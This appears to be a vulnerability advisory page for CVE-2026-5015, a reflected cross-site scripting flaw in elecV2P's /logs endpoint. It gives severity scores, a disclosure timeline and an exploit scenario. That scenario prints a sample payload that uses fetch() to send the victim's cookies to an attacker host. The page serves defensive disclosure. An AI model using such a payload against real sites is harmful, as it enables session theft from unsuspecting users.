Skip to main content

Elecv2P EUVD-2026-16949

| CVE-2026-5015 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-03-28 VulDB GHSA-8h9m-gcc8-25c6
XSS Elecv2P
2.1
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
2.1 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

6
Severity Changed
Apr 29, 2026 - 01:11 NVD
MEDIUM LOW
CVSS changed
Apr 29, 2026 - 01:11 NVD
5.3 (MEDIUM) 2.1 (LOW)
PoC Detected
Mar 30, 2026 - 13:26 vuln.today
Public exploit code
EUVD ID Assigned
Mar 28, 2026 - 21:15 euvd
EUVD-2026-16949
Analysis Generated
Mar 28, 2026 - 21:15 vuln.today
CVE Published
Mar 28, 2026 - 21:00 nvd
MEDIUM 5.3

DescriptionCVE.org

A vulnerability was determined in elecV2 elecV2P up to 3.8.3. The impacted element is an unknown function of the file /logs of the component Endpoint. This manipulation of the argument filename causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.

AnalysisAI

Reflected cross-site scripting (XSS) in elecV2P up to version 3.8.3 allows remote attackers to inject malicious scripts via the filename parameter in the /logs endpoint, requiring user interaction to execute. The vulnerability has publicly available exploit code and affects all versions through 3.8.3, with no vendor patch released despite early notification through issue reporting.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment The CVSS v4.0 score of 5.3 reflects a Medium-severity vulnerability with network attack vector and no privilege requirements, but requiring user interaction (UI:P). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker crafts a malicious URL targeting the /logs endpoint with a filename parameter containing JavaScript payload (e.g., /logs?filename=<img src=x onerror=fetch('https://attacker.com/steal?cookie='+document.cookie)>), then sends this link to a victim user via phishing email or chat. When the victim clicks the link while authenticated or in a browser session with elecV2P, the injected script executes in their browser context, potentially stealing session cookies, credentials, or performing actions on their behalf. …
Remediation No vendor-released patch identified at time of analysis. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 30 days: Identify affected systems running elecV2 elecV2P and apply vendor patches as part of regular patch cycle. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-16949 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy